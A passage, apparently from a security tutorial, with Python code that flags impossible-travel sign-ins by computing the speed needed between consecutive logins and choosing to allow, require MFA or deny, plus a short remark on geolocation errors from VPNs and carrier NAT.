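# impossible; several times that is treated as outright credential misuse.
MAX_PLAUSIBLE_KMH = 900.0
DENY_MULTIPLIER = 3.0

# Constructed sign-in events (not real data), already geolocated by the
# identity provider: (user, UTC timestamp, source IP, latitude, longitude).
SAMPLE_SIGNINS = [
    ("alice", "2024-03-01T09:00:00Z", "203.0.113.10", 40.7128, -74.0060),  # New York
    ("alice", "2024-03-01T09:10:00Z", "198.51.100.7", 35.6762, 139.6503),  # Tokyo, 10 min later
    ("bob", "2024-03-01T08:00:00Z", "192.0.2.15", 51.5074, -0.1278),       # London
    ("bob", "2024-03-01T11:00:00Z", "192.0.2.99", 48.8566, 2.3522),        # Paris, 3 h later
]


class TravelAlert(NamedTuple):
    user: str
    prev_ip: str
    cur_ip: str
    km: float
    kmh: float
    action: str  # "require_mfa" or "deny"


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance on a sphere of radius 6371 km."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def required_speed_kmh(prev, cur) -> float:
    """Speed the user would need to reach the second login location in time."""
    km = haversine_km(prev[3], prev[4], cur[3], cur[4])
    hours = (parse_ts(cur[1]) - parse_ts(prev[1])).total_seconds() / 3600
    if hours <= 0:  # same-second logins from different places are impossible
        return math.inf if km > 0 else 0.0
    return km / hours


def decide(kmh: float, max_kmh: float = MAX_PLAUSIBLE_KMH) -> str:
    """Conditional-access outcome: allow, step-up authentication, or a hard deny."""
    if kmh > max_kmh * DENY_MULTIPLIER:
        return "deny"
    if kmh > max_kmh:
        return "require_mfa"
    return "allow"


def detect_impossible_travel(events, max_kmh: float = MAX_PLAUSIBLE_KMH) -> list:
    """Compare each login with the same user's previous one, in time order."""
    alerts, last_seen = [], {}
    for ev in sorted(events, key=lambda e: (e[0], parse_ts(e[1]))):
        prev = last_seen.get(ev[0])
        if prev is not None:
            kmh = required_speed_kmh(prev, ev)
            action = decide(kmh, max_kmh)
            if action != "allow":
                km = haversine_km(prev[3], prev[4], ev[3], ev[4])
                alerts.append(TravelAlert(ev[0], prev[2], ev[2], round(km, 1), round(kmh, 1), action))
        last_seen[ev[0]] = ev
    return alerts
```

Geolocation accuracy is the weak point of this check in practice: VPN egress points and mobile carrier NAT ranges can place a legitimate user far from where they are, so the "require_mfa" tier exists to challenge rather than block borderline cases.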